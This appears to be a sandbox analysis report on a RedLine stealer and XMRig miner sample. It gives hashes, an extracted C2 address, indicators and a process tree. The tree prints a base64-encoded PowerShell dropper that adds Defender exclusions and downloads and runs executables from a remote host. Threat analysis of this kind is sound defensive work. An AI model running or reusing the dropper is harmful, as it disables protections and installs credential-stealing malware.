redline | eab9a40c5379d460e7d5f3d11c2b766ce8674c2240110e063fecb0c651e0dd67

Analysis

max time kernel
151s
max time network
110s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
11-11-2022 02:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

C4Loader.exe
Size

575KB
MD5

f159c8d7601d866641a6d31918d62e9e
SHA1

2642f901f2d802e864d0a38da5095938ef143abb
SHA256

eab9a40c5379d460e7d5f3d11c2b766ce8674c2240110e063fecb0c651e0dd67
SHA512

da8ca4535c7476be5a157867cf516973fe634391be33a007f1c53afa3f8936b868edd3ce22da3e2152c14ed04660375781454ed38247d266a3136cb0f5a2f570
SSDEEP

12288:ufG4JSQ6SUuy5OR62Cf/tUdCEiYQIF9GPUIcMGCozutXffjqAZgR:ufG4IQ6SUuyOCEiYQg9GPUIRoyfaR

Score

10^/10

redline xmrig 1 evasion infostealer miner spyware upx

Malware Config

Extracted

Family

redline

Botnet

107.182.129.73:21733

Attributes

auth_value
3a5bb0917495b4312d052a0b8977d2bb

Signatures

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 5 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1124-113-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral1/memory/1124-118-0x000000000041ADAE-mapping.dmp	family_redline
behavioral1/memory/1148-119-0x00000000001B0000-0x00000000001EE000-memory.dmp	family_redline
behavioral1/memory/1124-120-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral1/memory/1124-121-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline

Suspicious use of NtCreateUserProcessOtherParentProcess 17 IoCs

Processes:

SmartDefRun.exeSmartScreenQC.exeSmartDefRun.exedialer.exe

description	pid	process	target process
PID 1540 created 1216	1540	SmartDefRun.exe	Explorer.EXE
PID 1540 created 1216	1540	SmartDefRun.exe	Explorer.EXE
PID 1540 created 1216	1540	SmartDefRun.exe	Explorer.EXE
PID 1540 created 1216	1540	SmartDefRun.exe	Explorer.EXE
PID 1540 created 1216	1540	SmartDefRun.exe	Explorer.EXE
PID 588 created 1216	588	SmartScreenQC.exe	Explorer.EXE
PID 588 created 1216	588	SmartScreenQC.exe	Explorer.EXE
PID 588 created 1216	588	SmartScreenQC.exe	Explorer.EXE
PID 976 created 1216	976	SmartDefRun.exe	Explorer.EXE
PID 976 created 1216	976	SmartDefRun.exe	Explorer.EXE
PID 976 created 1216	976	SmartDefRun.exe	Explorer.EXE
PID 976 created 1216	976	SmartDefRun.exe	Explorer.EXE
PID 976 created 1216	976	SmartDefRun.exe	Explorer.EXE
PID 588 created 1216	588	SmartScreenQC.exe	Explorer.EXE
PID 588 created 1216	588	SmartScreenQC.exe	Explorer.EXE
PID 976 created 1216	976	dialer.exe	Explorer.EXE
PID 588 created 1216	588	SmartScreenQC.exe	Explorer.EXE

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 2 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/1124-277-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/1124-283-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exepowershell.exe

flow pid process

4 1512 powershell.exe
9 1012 powershell.exe
Downloads MZ/PE file

flow	pid	process
4	1512	powershell.exe
9	1012	powershell.exe

Drops file in Drivers directory 3 IoCs

Processes:

SmartDefRun.exeSmartScreenQC.exeSmartDefRun.exe

description	ioc	process
File created	C:\Windows\System32\drivers\etc\hosts	SmartDefRun.exe
File created	C:\Windows\System32\drivers\etc\hosts	SmartScreenQC.exe
File created	C:\Windows\System32\drivers\etc\hosts	SmartDefRun.exe

Executes dropped EXE 8 IoCs

Processes:

new2.exeSysApp.exeSmartDefRun.exeSmartScreenQC.exenew2.exeSysApp.exeSmartDefRun.exefodhelper.exe

pid process

1148 new2.exe
1776 SysApp.exe
1540 SmartDefRun.exe
588 SmartScreenQC.exe
1252 new2.exe
1396 SysApp.exe
976 SmartDefRun.exe
892 fodhelper.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

pid	process
1148	new2.exe
1776	SysApp.exe
1540	SmartDefRun.exe
588	SmartScreenQC.exe
1252	new2.exe
1396	SysApp.exe
976	SmartDefRun.exe
892	fodhelper.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/1124-277-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/1124-283-0x0000000140000000-0x00000001407F4000-memory.dmp	upx

Loads dropped DLL 9 IoCs

Processes:

powershell.exetaskeng.exepowershell.exe

pid	process
1512	powershell.exe
1512	powershell.exe
1512	powershell.exe
1512	powershell.exe
968	taskeng.exe
1012	powershell.exe
1012	powershell.exe
1012	powershell.exe
1012	powershell.exe

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Drops file in System32 directory 10 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.EXEpowershell.exepowershell.exepowershell.exepowershell.EXEpowershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 8 IoCs

Processes:

C4Loader.exenew2.exeSmartDefRun.exeC4Loader.exeC4Loader.exeSmartDefRun.exeSmartScreenQC.exe

description	pid	process	target process
PID 1972 set thread context of 1724	1972	C4Loader.exe	vbc.exe
PID 1148 set thread context of 1124	1148	new2.exe	vbc.exe
PID 1540 set thread context of 300	1540	SmartDefRun.exe	dialer.exe
PID 472 set thread context of 1548	472	C4Loader.exe	vbc.exe
PID 1348 set thread context of 1388	1348	C4Loader.exe	vbc.exe
PID 976 set thread context of 1012	976	SmartDefRun.exe	dialer.exe
PID 588 set thread context of 976	588	SmartScreenQC.exe	dialer.exe
PID 588 set thread context of 1124	588	SmartScreenQC.exe	dialer.exe

Drops file in Program Files directory 5 IoCs

Processes:

SmartDefRun.exeSmartDefRun.exeSmartScreenQC.execmd.execmd.exe

description	ioc	process
File created	C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe	SmartDefRun.exe
File created	C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe	SmartDefRun.exe
File created	C:\Program Files\Google\Libs\WR64.sys	SmartScreenQC.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe

Launches sc.exe 15 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	process
748	sc.exe
1012	sc.exe
1360	sc.exe
1628	sc.exe
1592	sc.exe
1532	sc.exe
580	sc.exe
1340	sc.exe
1252	sc.exe
956	sc.exe
284	sc.exe
1644	sc.exe
1508	sc.exe
1384	sc.exe
1720	sc.exe

Program crash 3 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exe

pid pid_target process target process

1604 1972 WerFault.exe C4Loader.exe
1756 472 WerFault.exe C4Loader.exe
560 1348 WerFault.exe C4Loader.exe
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

1720 schtasks.exe
1596 schtasks.exe
1124 schtasks.exe
1784 schtasks.exe
436 schtasks.exe

pid	pid_target	process	target process
1604	1972	WerFault.exe	C4Loader.exe
1756	472	WerFault.exe	C4Loader.exe
560	1348	WerFault.exe	C4Loader.exe

pid	process
1720	schtasks.exe
1596	schtasks.exe
1124	schtasks.exe
1784	schtasks.exe
436	schtasks.exe

Modifies data under HKEY_USERS 7 IoCs

Processes:

dialer.exepowershell.EXEWMIC.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates	dialer.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\CRLs	dialer.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\CTLs	dialer.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = f0b462fb81f5d801	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	dialer.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exeSmartDefRun.exeSysApp.exepowershell.exepowershell.exepowershell.exepowershell.exeSmartScreenQC.exepowershell.exepowershell.EXEpowershell.exevbc.exeSmartDefRun.exeSysApp.exepowershell.exepowershell.exepowershell.exe

pid	process
1512	powershell.exe
1512	powershell.exe
1512	powershell.exe
1512	powershell.exe
1512	powershell.exe
1512	powershell.exe
1512	powershell.exe
1512	powershell.exe
1512	powershell.exe
1540	SmartDefRun.exe
1540	SmartDefRun.exe
1776	SysApp.exe
1776	SysApp.exe
1776	SysApp.exe
1776	SysApp.exe
1776	SysApp.exe
1168	powershell.exe
1540	SmartDefRun.exe
1540	SmartDefRun.exe
1540	SmartDefRun.exe
1540	SmartDefRun.exe
1736	powershell.exe
1540	SmartDefRun.exe
1540	SmartDefRun.exe
1540	SmartDefRun.exe
1540	SmartDefRun.exe
1012	powershell.exe
572	powershell.exe
588	SmartScreenQC.exe
588	SmartScreenQC.exe
1456	powershell.exe
588	SmartScreenQC.exe
588	SmartScreenQC.exe
1172	powershell.EXE
588	SmartScreenQC.exe
588	SmartScreenQC.exe
1656	powershell.exe
1124	vbc.exe
1012	powershell.exe
1012	powershell.exe
1012	powershell.exe
1012	powershell.exe
1012	powershell.exe
1012	powershell.exe
1012	powershell.exe
1012	powershell.exe
976	SmartDefRun.exe
976	SmartDefRun.exe
1396	SysApp.exe
1396	SysApp.exe
1396	SysApp.exe
1396	SysApp.exe
1396	SysApp.exe
108	powershell.exe
976	SmartDefRun.exe
976	SmartDefRun.exe
976	SmartDefRun.exe
976	SmartDefRun.exe
700	powershell.exe
976	SmartDefRun.exe
976	SmartDefRun.exe
976	SmartDefRun.exe
976	SmartDefRun.exe
1564	powershell.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

464

pid	process
464

Suspicious use of AdjustPrivilegeToken 37 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.EXEpowershell.exevbc.exepowershell.exepowershell.exepowershell.exeWMIC.exedialer.exe

description	pid	process
Token: SeDebugPrivilege	1512	powershell.exe
Token: SeDebugPrivilege	1168	powershell.exe
Token: SeDebugPrivilege	1736	powershell.exe
Token: SeDebugPrivilege	1012	powershell.exe
Token: SeDebugPrivilege	572	powershell.exe
Token: SeDebugPrivilege	1456	powershell.exe
Token: SeDebugPrivilege	1172	powershell.EXE
Token: SeDebugPrivilege	1656	powershell.exe
Token: SeDebugPrivilege	1124	vbc.exe
Token: SeDebugPrivilege	108	powershell.exe
Token: SeDebugPrivilege	700	powershell.exe
Token: SeDebugPrivilege	1564	powershell.exe
Token: SeAssignPrimaryTokenPrivilege	1744	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1744	WMIC.exe
Token: SeSecurityPrivilege	1744	WMIC.exe
Token: SeTakeOwnershipPrivilege	1744	WMIC.exe
Token: SeLoadDriverPrivilege	1744	WMIC.exe
Token: SeSystemtimePrivilege	1744	WMIC.exe
Token: SeBackupPrivilege	1744	WMIC.exe
Token: SeRestorePrivilege	1744	WMIC.exe
Token: SeShutdownPrivilege	1744	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1744	WMIC.exe
Token: SeUndockPrivilege	1744	WMIC.exe
Token: SeManageVolumePrivilege	1744	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	1744	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1744	WMIC.exe
Token: SeSecurityPrivilege	1744	WMIC.exe
Token: SeTakeOwnershipPrivilege	1744	WMIC.exe
Token: SeLoadDriverPrivilege	1744	WMIC.exe
Token: SeSystemtimePrivilege	1744	WMIC.exe
Token: SeBackupPrivilege	1744	WMIC.exe
Token: SeRestorePrivilege	1744	WMIC.exe
Token: SeShutdownPrivilege	1744	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1744	WMIC.exe
Token: SeUndockPrivilege	1744	WMIC.exe
Token: SeManageVolumePrivilege	1744	WMIC.exe
Token: SeLockMemoryPrivilege	1124	dialer.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

C4Loader.exevbc.exepowershell.execmd.exepowershell.exenew2.exe

description	pid	process	target process
PID 1972 wrote to memory of 1724	1972	C4Loader.exe	vbc.exe
PID 1972 wrote to memory of 1724	1972	C4Loader.exe	vbc.exe
PID 1972 wrote to memory of 1724	1972	C4Loader.exe	vbc.exe
PID 1972 wrote to memory of 1724	1972	C4Loader.exe	vbc.exe
PID 1972 wrote to memory of 1724	1972	C4Loader.exe	vbc.exe
PID 1972 wrote to memory of 1724	1972	C4Loader.exe	vbc.exe
PID 1972 wrote to memory of 1604	1972	C4Loader.exe	WerFault.exe
PID 1972 wrote to memory of 1604	1972	C4Loader.exe	WerFault.exe
PID 1972 wrote to memory of 1604	1972	C4Loader.exe	WerFault.exe
PID 1972 wrote to memory of 1604	1972	C4Loader.exe	WerFault.exe
PID 1724 wrote to memory of 1512	1724	vbc.exe	powershell.exe
PID 1724 wrote to memory of 1512	1724	vbc.exe	powershell.exe
PID 1724 wrote to memory of 1512	1724	vbc.exe	powershell.exe
PID 1724 wrote to memory of 1512	1724	vbc.exe	powershell.exe
PID 1512 wrote to memory of 472	1512	powershell.exe	C4Loader.exe
PID 1512 wrote to memory of 472	1512	powershell.exe	C4Loader.exe
PID 1512 wrote to memory of 472	1512	powershell.exe	C4Loader.exe
PID 1512 wrote to memory of 472	1512	powershell.exe	C4Loader.exe
PID 1512 wrote to memory of 1148	1512	powershell.exe	new2.exe
PID 1512 wrote to memory of 1148	1512	powershell.exe	new2.exe
PID 1512 wrote to memory of 1148	1512	powershell.exe	new2.exe
PID 1512 wrote to memory of 1148	1512	powershell.exe	new2.exe
PID 1512 wrote to memory of 1776	1512	powershell.exe	SysApp.exe
PID 1512 wrote to memory of 1776	1512	powershell.exe	SysApp.exe
PID 1512 wrote to memory of 1776	1512	powershell.exe	SysApp.exe
PID 1512 wrote to memory of 1776	1512	powershell.exe	SysApp.exe
PID 1512 wrote to memory of 1540	1512	powershell.exe	SmartDefRun.exe
PID 1512 wrote to memory of 1540	1512	powershell.exe	SmartDefRun.exe
PID 1512 wrote to memory of 1540	1512	powershell.exe	SmartDefRun.exe
PID 1512 wrote to memory of 1540	1512	powershell.exe	SmartDefRun.exe
PID 1872 wrote to memory of 748	1872	cmd.exe	sc.exe
PID 1872 wrote to memory of 748	1872	cmd.exe	sc.exe
PID 1872 wrote to memory of 748	1872	cmd.exe	sc.exe
PID 1872 wrote to memory of 1012	1872	cmd.exe	sc.exe
PID 1872 wrote to memory of 1012	1872	cmd.exe	sc.exe
PID 1872 wrote to memory of 1012	1872	cmd.exe	sc.exe
PID 1872 wrote to memory of 1360	1872	cmd.exe	sc.exe
PID 1872 wrote to memory of 1360	1872	cmd.exe	sc.exe
PID 1872 wrote to memory of 1360	1872	cmd.exe	sc.exe
PID 1872 wrote to memory of 1532	1872	cmd.exe	sc.exe
PID 1872 wrote to memory of 1532	1872	cmd.exe	sc.exe
PID 1872 wrote to memory of 1532	1872	cmd.exe	sc.exe
PID 1872 wrote to memory of 1628	1872	cmd.exe	sc.exe
PID 1872 wrote to memory of 1628	1872	cmd.exe	sc.exe
PID 1872 wrote to memory of 1628	1872	cmd.exe	sc.exe
PID 1872 wrote to memory of 1212	1872	cmd.exe	reg.exe
PID 1872 wrote to memory of 1212	1872	cmd.exe	reg.exe
PID 1872 wrote to memory of 1212	1872	cmd.exe	reg.exe
PID 1872 wrote to memory of 1516	1872	cmd.exe	reg.exe
PID 1872 wrote to memory of 1516	1872	cmd.exe	reg.exe
PID 1872 wrote to memory of 1516	1872	cmd.exe	reg.exe
PID 1872 wrote to memory of 1560	1872	cmd.exe	reg.exe
PID 1872 wrote to memory of 1560	1872	cmd.exe	reg.exe
PID 1872 wrote to memory of 1560	1872	cmd.exe	reg.exe
PID 1872 wrote to memory of 1680	1872	cmd.exe	reg.exe
PID 1872 wrote to memory of 1680	1872	cmd.exe	reg.exe
PID 1872 wrote to memory of 1680	1872	cmd.exe	reg.exe
PID 1872 wrote to memory of 1172	1872	cmd.exe	reg.exe
PID 1872 wrote to memory of 1172	1872	cmd.exe	reg.exe
PID 1872 wrote to memory of 1172	1872	cmd.exe	reg.exe
PID 1736 wrote to memory of 1720	1736	powershell.exe	schtasks.exe
PID 1736 wrote to memory of 1720	1736	powershell.exe	schtasks.exe
PID 1736 wrote to memory of 1720	1736	powershell.exe	schtasks.exe
PID 1148 wrote to memory of 1124	1148	new2.exe	vbc.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1216

C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
"C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
2⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1972

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:1724

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcgBwACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAagBnAHQAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaQBiAG4AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbQBlAHAAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBkAGQAbgBzAC4AbgBlAHQALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBDADQATABvAGEAZABlAHIALgBlAHgAZQAnACwAIAA8ACMAZQB0AHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBlAHkAagAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBtAGcAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBDADQATABvAGEAZABlAHIALgBlAHgAZQAnACkAKQA8ACMAZQB0AHMAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBvAG4AbgBlAGMAdAAyAG0AZQAuAGQAZABuAHMALgBuAGUAdAAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAG4AZQB3ADIALgBlAHgAZQAnACwAIAA8ACMAcgBiAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBoAHAAZQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBsAGUAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBuAGUAdwAyAC4AZQB4AGUAJwApACkAPAAjAGYAaAB1ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBkAGQAbgBzAC4AbgBlAHQALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAHkAcwBBAHAAcAAuAGUAeABlACcALAAgADwAIwBsAHAAcQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHkAcwBjACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAbQB0ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApACkAPAAjAG4AdABrACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBkAGQAbgBzAC4AbgBlAHQALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAG0AYQByAHQARABlAGYAUgB1AG4ALgBlAHgAZQAnACwAIAA8ACMAegB6AGwAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB5AGgAbAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBtAHgAcgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAG0AYQByAHQARABlAGYAUgB1AG4ALgBlAHgAZQAnACkAKQA8ACMAcQB4AHoAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAagB0AG0AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHoAYwBsACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcAKQA8ACMAaABxAGgAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAYwBnAGEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGIAawB3ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAG4AZQB3ADIALgBlAHgAZQAnACkAPAAjAGsAcgBwACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHYAbQByACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBhAHgAagAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAHkAcwBBAHAAcAAuAGUAeABlACcAKQA8ACMAZgBiAGIAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdABmAG0AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHoAaQB3ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcAKQA8ACMAYgBwAHMAIwA+AA=="
4⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1512

C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
"C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
5⤵
- Suspicious use of SetThreadContext
PID:472

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
6⤵
PID:1548

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcgBwACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAagBnAHQAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaQBiAG4AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbQBlAHAAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBkAGQAbgBzAC4AbgBlAHQALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBDADQATABvAGEAZABlAHIALgBlAHgAZQAnACwAIAA8ACMAZQB0AHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBlAHkAagAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBtAGcAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBDADQATABvAGEAZABlAHIALgBlAHgAZQAnACkAKQA8ACMAZQB0AHMAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBvAG4AbgBlAGMAdAAyAG0AZQAuAGQAZABuAHMALgBuAGUAdAAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAG4AZQB3ADIALgBlAHgAZQAnACwAIAA8ACMAcgBiAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBoAHAAZQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBsAGUAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBuAGUAdwAyAC4AZQB4AGUAJwApAC